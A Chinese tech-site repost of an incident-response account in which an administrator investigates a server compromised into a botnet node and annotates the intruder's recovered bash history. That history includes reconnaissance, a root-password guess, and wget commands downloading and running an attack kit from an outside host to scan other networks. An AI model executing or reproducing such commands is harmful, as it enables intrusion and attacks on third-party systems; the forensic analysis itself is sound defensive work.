加入收藏 | 设为首页 | 会员中心 | 我要投稿 威海站长网 (https://www.0631zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长资讯 > 外闻 > 正文

一次服务器沦陷为肉鸡后的实战排查过程!

发布时间:2019-06-11 09:36:32 所属栏目:外闻 来源:民工哥技术之路
导读:1、从防火墙瘫痪说起 今天还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏览网页。急急忙忙感到公司,开始查找问题。 首先排除了交换机故障,因为内部局域网正常。当ping防火墙设备时,丢包严重。很明显,防火墙出了问题,撑不

下面看看黑客用oracle账户都做了什么。首先复制一份oracle的命令历史,防止后续操作丢失该记录。

  1. cp /home/oracle/.bash_history hacker_history 

然后查看分析这个文件。 我在后面备注了黑客的想法。

  1. vi .bash_profile 
  2. vi .bash_profile (查看.bash_profile,看变量设置,把/home/oracle/bin增加到PATH) 
  3. ll 
  4. cd / 
  5. vi .bash_profile 
  6. vi .bash_profile (执行,设置环境变量) 
  7. ps x (查看系统运行进程) 
  8. free -m (查看内存大小) 
  9. uname -a (查看系统版本) 
  10. cat /etc/issue (查看系统发行版) 
  11. cat /etc/hosts (查看是否有网内机器) 
  12. cat /proc/cpuinfo (查看CPU型号) 
  13. cat .bash_history (查看oracle账户历史操作) 
  14. w (查看系统负载) 
  15. ls -a (查看/home/oracle/下的隐藏文件) 
  16. passwd (修改掉oracle账户的密码) 
  17. exit  
  18. ls  
  19. oracle 
  20. sqlplus (运行sqlplus) 
  21. su (试图切换到root账户) 
  22. app1123456 (猜测root密码) 
  23. ls  
  24. su - 
  25. free -m 
  26. php -v (查看php版本) 
  27. exit 
  28. free -m 
  29. php -v 
  30. ps aux 
  31. ls -a 
  32. exit 
  33. free -m 
  34. php -v 
  35. cat bash_his (查看历史命令) 
  36. cat bash_history 
  37. cat .bash_history 
  38. wget scriptcoders.ucoz.com/piata.tgz (下载肉鸡攻击软件包) 
  39. tar zxvf piata.tgz (解压软件包) 
  40. rm -rf piata.tgz (删除软件包) 
  41. cd piata/ (切换到攻击软件目录) 
  42. ls -a 
  43. chmod +x * 
  44. ./a 210.212 (运行攻击软件) 
  45. screen (试图运行screen命令,发现没有后下载它) 
  46. ls -a 
  47. wget scriptcoders.ucoz.com/screen.tgz 
  48. tar zxvf screen.tgz (解压) 
  49. ./screen 
  50. exit 
  51. ps x 
  52. cd piata/ (切换到攻击软件目录) 
  53. ls -a 
  54. cat vuln.txt (查看攻击结果) 
  55. ls -a 
  56. mv vuln.txt 1.txt (保存攻击结果) 
  57. ./screen -r 
  58. nano 1.txt (查看结果文件) 
  59. ps x 
  60. exit 
  61. cd piata 
  62. ps x 
  63. ls -a 
  64. nano 2.txt 
  65. exit 
  66. ps x 
  67. cd piata/ 
  68. ls -a 
  69. cat  
  70. mv vuln.txt 2.txt (保存结果) 
  71. nano 2.txt 
  72. ps x 
  73. cd piata/ 
  74. ls- a 
  75. cat vuln.txt  
  76. rm -rf vuln.txt  
  77. ./screen -r 
  78. exit 
  79. ps x 
  80. cd piata/ 
  81. ls -a 
  82. cat vuln.txt  
  83. ls -a 
  84. mv vuln.txt 3.txt (保存结果) 
  85. nano 3.txt  
  86. exit 
  87. ps x 
  88. cd piata/ 
  89. ls -a 
  90. cat vuln.txt  
  91. rm -rf vuln.txt  
  92. exit 
  93. ps x 
  94. cd piata/ 
  95. ls -a 
  96. cat vuln.txt  
  97. rm -rf vuln.txt  
  98. rm -rf 1.txt  
  99. rm -rf 2.txt 
  100. rm -rf 2.txt.save  
  101. rm -rf 3.txt  
  102. screen -r 
  103. ./screen -r 
  104. exit 
  105. ps x 
  106. cd piata/ 
  107. ls -a 
  108. cat vuln.txt  
  109. ls -a 
  110. nano vuln.txt  
  111. rm -rf vuln.txt  
  112. screen -r 
  113. ./screen -r 
  114. exit 
  115. ps x 
  116. cd piata/ 
  117. ls -a 
  118. cat vuln.txt  
  119. nano vuln.txt  
  120. ls -a 
  121. rm -rf vuln.txt  
  122. screen -r 
  123. ./screen -r 
  124. exit 
  125. ps x 
  126. cd piata/ 
  127. ls -a 
  128. cat vuln.txt  
  129. rm -rf vuln.txt  
  130. ps x 
  131. ls -a 
  132. ./screen -r 
  133. exit 
  134. ps x 
  135. cd piata/ 
  136. ls -a 
  137. cat vuln.txt  
  138. nano vuln.txt  
  139. rm -rf vuln.txt  
  140. ./screen -r 
  141. exit 

3.3 攻击工具一览

(编辑:威海站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读